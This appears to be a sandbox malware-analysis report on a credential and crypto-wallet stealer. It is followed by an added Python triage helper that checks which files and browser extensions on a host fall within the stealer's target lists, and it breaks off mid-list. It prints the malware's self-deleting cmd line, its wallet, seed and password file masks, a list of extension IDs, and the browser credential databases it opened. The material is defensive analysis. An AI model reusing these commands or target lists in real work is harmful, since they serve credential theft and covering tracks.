                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe" & rd /s /q "C:\ProgramData\t0r90" & exit
                  Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: GetKeyboardLayoutList,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,3_2_0040DE1C
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                  Source: C:\Users\user\Desktop\N11R7lRasm.exe | Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation
                  Source: C:\Users\user\Desktop\N11R7lRasm.exe | Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Queries volume information: C:\ VolumeInformation
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Queries volume information: C:\ VolumeInformation
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_00417842 SetFilePointer,SetFilePointer,GetLocalTime,SystemTimeToFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,3_2_00417842
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_00414CDB EntryPoint,lstrlenW,GetWindowsDirectoryW,GetComputerNameW,GetFullPathNameA,GetUserNameW,GetFileType,GetModuleFileNameA,GetTempPathW,3_2_00414CDB
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_0040DDBF GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,3_2_0040DDBF
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                  Stealing of Sensitive Information

                  Source: Yara match | File source: sslproxydump.pcap, type: PCAP
                  Source: Yara match | File source: 3.2.BitLockerToGo.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.N11R7lRasm.exe.aa00000.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.N11R7lRasm.exe.aa40000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.N11R7lRasm.exe.aa20000.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.N11R7lRasm.exe.a9e0000.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 3.2.BitLockerToGo.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 00000000.00000002.1855724656.000000000AB16000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000003.00000003.1906846457.0000000000CA7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000002.1855724656.000000000AA40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000002.1855724656.000000000AA00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000003.00000003.1920673890.0000000000CA1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000002.1855724656.000000000AA20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000003.00000003.1906650767.0000000000CA7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000002.1855724656.000000000A9E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000003.00000003.1934326719.0000000000CA1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000003.00000002.2650192251.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: N11R7lRasm.exe PID: 4424, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: BitLockerToGo.exe PID: 6552, type: MEMORYSTR
                  Source: BitLockerToGo.exe, 00000003.00000002.2653431701.000000000556D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: *wallet*.*,*seed*.*,*btc*.*,*key*.*,*2fa*.*,*crypto*.*,*coin*.*,*private*.*,*2fa*.*,*auth*.*,*ledger*.*,*trezor*.*,*pass*.*,*wal*.*,*upbit*.*,*bcex*.*,*bithimb*.*,*hitbtc*.*,*bitflyer*.*,*kucoin*.*,*huobi*.*,*poloniex*.*,*kraken*.*,*okex*.*,*binance*.*,*bitfinex*.*,*gdax*.*,*ethereum*.*,*exodus*.*,*metamask*.*,*myetherwallet*.*,*electrum*.*,*bitcoin*.*,*blockchain*.*,*coinomi*.*,*words*.*,*meta*.*,*mask*.*,*eth*.*,*recovery*.*
                  Source: BitLockerToGo.exe, 00000003.00000002.2650827814.0000000000C93000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \ElectronCash\wallets\
                  Source: BitLockerToGo.exe, 00000003.00000002.2650827814.0000000000C93000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \Electrum\wallets\
                  Source: BitLockerToGo.exe, 00000003.00000002.2650827814.0000000000C93000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
                  Source: BitLockerToGo.exe, 00000003.00000002.2650827814.0000000000C93000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: exodus.conf.json
                  Source: BitLockerToGo.exe, 00000003.00000002.2650827814.0000000000C93000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \Exodus\exodus.wallet\
                  Source: BitLockerToGo.exe, 00000003.00000002.2650827814.0000000000CDB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: info.seco
                  Source: BitLockerToGo.exe, 00000003.00000002.2650827814.0000000000CDB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ElectrumLTC
                  Source: BitLockerToGo.exe, 00000003.00000002.2650827814.0000000000CDB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: passphrase.json
                  Source: BitLockerToGo.exe, 00000003.00000002.2650827814.0000000000CDB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \Ethereum\
                  Source: BitLockerToGo.exe, 00000003.00000003.1934326719.0000000000C9A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: let|1|egjidjbpglichdcondbcbdnbeeppgdph|1|0|0|Exodus Web3 Wallet|1|aholpfdialjgjfhomihkjbmgjidlcdno|1|0|0|Braavos|1|jnlgamecbpmbajjfhmmmlhejkemejdma|1|0|0|Enkrypt|1|kkpllkodjeloidieedojogacfhpaihoh|1|0|0|OKX Web3 Wallet|1|mcohilncbfahbmgdjkbpemcciiolgcge|1|0|0|Sender|1|epapihdplajcdnnkdeiahlgigofloibg|1|0|0|Hashpack|1|gjagmgiddbbciopjhllkdnddhcglnemk|1|0|0|GeroWallet|1|bgpipimickeadkjlklgciifhnalhdjhe|1|0|0|Pontem Wallet|1|phkbamefinggmakgklpkljjmgibohnba|1|0|0|Finnie|1|cjmkndjhnagcfbpiemnkdpomccnjblmj|1|0|0|Leap Terra|1|aijcbedoijmgnlmjeegjaglmepbmpkpi|1|0|0|Microsoft AutoFill|0|fiedbfgcleddlbcmgdigjgdfcggjcion|1|0|0|Bitwarden|0|nngceckbapebfimnlniiiahkandclblb|1|0|0|KeePass Tusk|0|fmhmiaejopepamlcjkncpgpdjichnecm|1|0|0|KeePassXC-Browser|0|oboonakemofpalcgghocfoadofidjkkk|1|0|0|Rise - Aptos Wallet|1|hbbgbephgojikajhfbomhlmmollphcad|1|0|0|Rainbow Wallet|1|opfgelmcmbiajamepnmloijbpoleiama|1|0|0|Nightly|1|fiikommddbeccaoicoejoniammnalkfa|1|0|0|Ecto Wallet|1|bgjogpoidejdemgoochpnkmdjpocgkha|1|0|0|Coinhub|1|jgaaimajipbpdogpdglhaphldakikgef|1|0|0|Leap Cosmos Wallet|1|fcfcfllfndlomdhbehjjcoimbgofdncg|1|0|0|MultiversX DeFi Wallet|1|dngmlblcodfobpdpecaadgfbcggfjfnm|1|0|0|Frontier Wallet|1|kppfdiipphfccemcignhifpjkapfbihd|1|0|0|SafePal|1|lgmpcpglpngdoalbgeoldeajfclnhafa|1|0|0|SubWallet - Polkadot Wallet|1|onhogfjeacnfoofkfgppdlbmlmnplgbn|1|0|0|Fluvi Wallet|1|mmmjbcfofconkannjonfmjjajpllddbg|1|0|0|Glass Wallet - Sui Wallet|1|loinekcabhlmhjjbocijdoimmejangoa|1|0|0|Morphis Wallet|1|heefohaffomkkkphnlpohglngmbcclhi|1|0|0|Xverse Wallet|1|idnnbdplmphpflfnlkomgpfbpcgelopg|1|0|0|Compass Wallet for Sei|1|anokgmphncpekkhclmingpimjmcooifb|1|0|0|HAVAH Wallet|1|cnncmdhjacpkmjmkcafchppbnpnhdmon|1|0|0|Elli - Sui Wallet|1|ocjdpmoallmgmjbbogfiiaofphbjgchh|1|0|0|Venom Wallet|1|ojggmchlghnjlapmfbnjholfjkiidbch|1|0|0|Pulse Wallet 
Chromium|1|ciojocpkclfflombbcfigcijjcbkmhaf|1|0|0|Magic Eden Wallet|1|mkpegjkblkkefacfnmkajcjmabijhclg|1|0|0|Backpack Wallet|1|aflkmfhebedbjioipglgcbcmnbpgliof|1|0|0|Tonkeeper Wallet|1|omaabbefbmiijedngplfjmnooppbclkk|1|0|0|OpenMask Wallet|1|penjlddjkjgpnkllboccdgccekpkcbin|1|0|0|SafePal Wallet|1|apenkfbbpmhihehmihndmmcdanacolnh|1|0|0|Bitget Wallet|1|jiidiaalihmmhddjgbnbgdfflelocpak|1|0|0|TON Wallet|1|nphplpgoakhhjchkkhmiggakijnkhfnd|1|0|0|MyTonWallet|1|fldfpgipfncgndfolcbkdeeknbbbnhcc|1|0|0|Uniswap Extension|1|nnpmfplkfogfpmcngplhnbdnnilmcdcg|1|0|0|Alephium Wallet|1|gdokollfhmnbfckbobkdbakhilldkhcj|1|0|0|Talisman Wallet|1|fijngjgcjhjmmpcmkeiomlglpeiijkld|1|0|0|
                  Source: BitLockerToGo.exe, 00000003.00000002.2656831293.0000000005958000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance\simple-storage.json
                  Source: BitLockerToGo.exe, 00000003.00000002.2653431701.000000000556D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: *wallet*.*,*seed*.*,*btc*.*,*key*.*,*2fa*.*,*crypto*.*,*coin*.*,*private*.*,*2fa*.*,*auth*.*,*ledger*.*,*trezor*.*,*pass*.*,*wal*.*,*upbit*.*,*bcex*.*,*bithimb*.*,*hitbtc*.*,*bitflyer*.*,*kucoin*.*,*huobi*.*,*poloniex*.*,*kraken*.*,*okex*.*,*binance*.*,*bitfinex*.*,*gdax*.*,*ethereum*.*,*exodus*.*,*metamask*.*,*myetherwallet*.*,*electrum*.*,*bitcoin*.*,*blockchain*.*,*coinomi*.*,*words*.*,*meta*.*,*mask*.*,*eth*.*,*recovery*.*
                  Source: BitLockerToGo.exe, 00000003.00000002.2650827814.0000000000CDB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \Coinomi\Coinomi\wallets\
                  Source: BitLockerToGo.exe, 00000003.00000002.2650827814.0000000000C93000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \Exodus\exodus.wallet\
                  Source: BitLockerToGo.exe, 00000003.00000002.2650827814.0000000000C93000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: multidoge.wallet
                  Source: BitLockerToGo.exe, 00000003.00000002.2650827814.0000000000CDB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: seed.seco
                  Source: BitLockerToGo.exe, 00000003.00000002.2650827814.0000000000CDB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
                  Source: BitLockerToGo.exe, 00000003.00000002.2650827814.0000000000C93000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \Electrum-LTC\wallets\
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-coreJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\ConfigurationJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\3561288849sdhlie.files\key4.dbJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\key4.dbJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\kz8kl7vh.default\key4.dbJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\glean\key4.dbJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\crashes\key4.dbJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\glean\db\key4.dbJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\security_state\key4.dbJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\to-be-removed\key4.dbJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\crashes\events\key4.dbJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\key4.dbJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\glean\events\key4.dbJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files\key4.dbJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files\key4.dbJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\prefs.jsJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqliteJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\key4.dbJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\glean\pending_pings\key4.dbJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\bookmarkbackups\key4.dbJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\archived\2023-10\key4.dbJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqliteJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\key4.dbJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\saved-telemetry-pings\key4.dbJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\archived\key4.dbJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\glean\tmp\key4.dbJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\minidumps\key4.dbJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\sessionstore-backups\key4.dbJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files\key4.dbJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\key4.dbJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\key4.dbJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\2918063365piupsah.files\key4.dbJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files\key4.dbJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\key4.dbJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\Jump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\backups\Jump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\Jump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\Jump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\Jump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Binance\Jump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\Jump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\Jump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Jump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\config\Jump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\Jump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\Jump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\Jump to behavior
                  Source: Yara matchFile source: 00000003.00000002.2650827814.0000000000C93000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: BitLockerToGo.exe PID: 6552, type: MEMORYSTR
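Two of the strings above are the stealer's own targeting configuration: the comma-separated file-grabber mask list (*wallet*.*, *seed*.*, *key*.*, ...) and the pipe-delimited browser-extension list (name, a numeric field, the 32-character extension ID, then three more fields). The following is an added triage helper written for this page, not code from the Joe Sandbox report or from the Vidar sample. It parses both strings exactly as they appear in the memory dump and answers the question a responder asks first: which files and which installed extensions on a given host fell inside the stealer's scope. It also shows why the loose masks matter: *key*.*, *pass*.* and *auth*.* sweep up plenty of files with nothing to do with cryptocurrency. The extension blob embedded here is a slice of the full list; the host file paths and installed-extension IDs are constructed test data, and the reading of the second record field as "1 = wallet, 0 = password manager" is an assumption drawn from how the listed records read.

```python
"""Scope a host against the Vidar grabber masks and extension list shown above.

Added example for this page; not report code and not the sample's code.
GRABBER_MASKS and EXTENSION_BLOB are copied verbatim from the report (the blob
is a slice of the full list). SAMPLE_FILES / SAMPLE_INSTALLED_IDS are made up.
"""
import fnmatch
import ntpath
import re
from dataclasses import dataclass
from typing import Dict, List

GRABBER_MASKS = (
    "*wallet*.*,*seed*.*,*btc*.*,*key*.*,*2fa*.*,*crypto*.*,*coin*.*,*private*.*,"
    "*2fa*.*,*auth*.*,*ledger*.*,*trezor*.*,*pass*.*,*wal*.*,*upbit*.*,*bcex*.*,"
    "*bithimb*.*,*hitbtc*.*,*bitflyer*.*,*kucoin*.*,*huobi*.*,*poloniex*.*,"
    "*kraken*.*,*okex*.*,*binance*.*,*bitfinex*.*,*gdax*.*,*ethereum*.*,*exodus*.*,"
    "*metamask*.*,*myetherwallet*.*,*electrum*.*,*bitcoin*.*,*blockchain*.*,"
    "*coinomi*.*,*words*.*,*meta*.*,*mask*.*,*eth*.*,*recovery*.*"
)
EXTENSION_BLOB = (
    "Exodus Web3 Wallet|1|aholpfdialjgjfhomihkjbmgjidlcdno|1|0|0|"
    "Braavos|1|jnlgamecbpmbajjfhmmmlhejkemejdma|1|0|0|"
    "OKX Web3 Wallet|1|mcohilncbfahbmgdjkbpemcciiolgcge|1|0|0|"
    "Microsoft AutoFill|0|fiedbfgcleddlbcmgdigjgdfcggjcion|1|0|0|"
    "Bitwarden|0|nngceckbapebfimnlniiiahkandclblb|1|0|0|"
    "KeePassXC-Browser|0|oboonakemofpalcgghocfoadofidjkkk|1|0|0|"
    "Talisman Wallet|1|fijngjgcjhjmmpcmkeiomlglpeiijkld|1|0|0|"
)
EXT_ID_RE = re.compile(r"[a-p]{32}")  # Chromium extension IDs: 32 letters a-p


@dataclass(frozen=True)
class TargetedExtension:
    name: str
    extension_id: str
    is_wallet: bool   # assumption: record field 2 is 1 for wallets, 0 for password managers
    flags: tuple      # last three fields, kept as found


def parse_masks(mask_list: str) -> List[str]:
    """Lower-cased masks in original order, blanks and repeats dropped
    (the sample lists *2fa*.* twice)."""
    masks: List[str] = []
    for raw in mask_list.split(","):
        mask = raw.strip().lower()
        if mask and mask not in masks:
            masks.append(mask)
    return masks


def mask_matches(path: str, mask: str) -> bool:
    """Case-insensitive wildcard test on the file name only. Windows FindFirstFile
    reads a trailing '.*' as 'with or without an extension', which fnmatch does
    not, so a dotless name is retried against the mask with the '.*' removed."""
    name = ntpath.basename(path).lower()
    if fnmatch.fnmatchcase(name, mask):
        return True
    return mask.endswith(".*") and fnmatch.fnmatchcase(name, mask[:-2])


def files_in_scope(paths, masks) -> Dict[str, List[str]]:
    """Paths the grabber would collect, mapped to the masks that hit them."""
    hits: Dict[str, List[str]] = {}
    for path in paths:
        matched = [m for m in masks if mask_matches(path, m)]
        if matched:
            hits[path] = matched
    return hits


def parse_extension_list(blob: str) -> List[TargetedExtension]:
    """Six fields per record and no record separator beyond the field delimiter,
    so the field count must be a multiple of six and field 3 must be an ID."""
    fields = blob.strip("|").split("|")
    if len(fields) % 6:
        raise ValueError("extension list is not whole 6-field records")
    records = []
    for i in range(0, len(fields), 6):
        name, kind, ext_id, *flags = fields[i:i + 6]
        if not EXT_ID_RE.fullmatch(ext_id):
            raise ValueError(f"{name!r}: {ext_id!r} is not a Chromium extension id")
        records.append(TargetedExtension(name, ext_id, kind == "1", tuple(flags)))
    return records


def installed_targets(installed_ids, targets) -> List[TargetedExtension]:
    """Targeted extensions present on the host, in the stealer's list order."""
    present = set(installed_ids)
    return [t for t in targets if t.extension_id in present]


# Constructed host inventory. The wallet directories in the report (Exodus,
# Electrum, ...) are walked by dedicated paths; the masks are for loose files.
SAMPLE_FILES = [
    r"C:\Users\alice\Documents\wallet-backup.txt",
    r"C:\Users\alice\Documents\keyboard_layout.pdf",   # collateral hit on *key*.*
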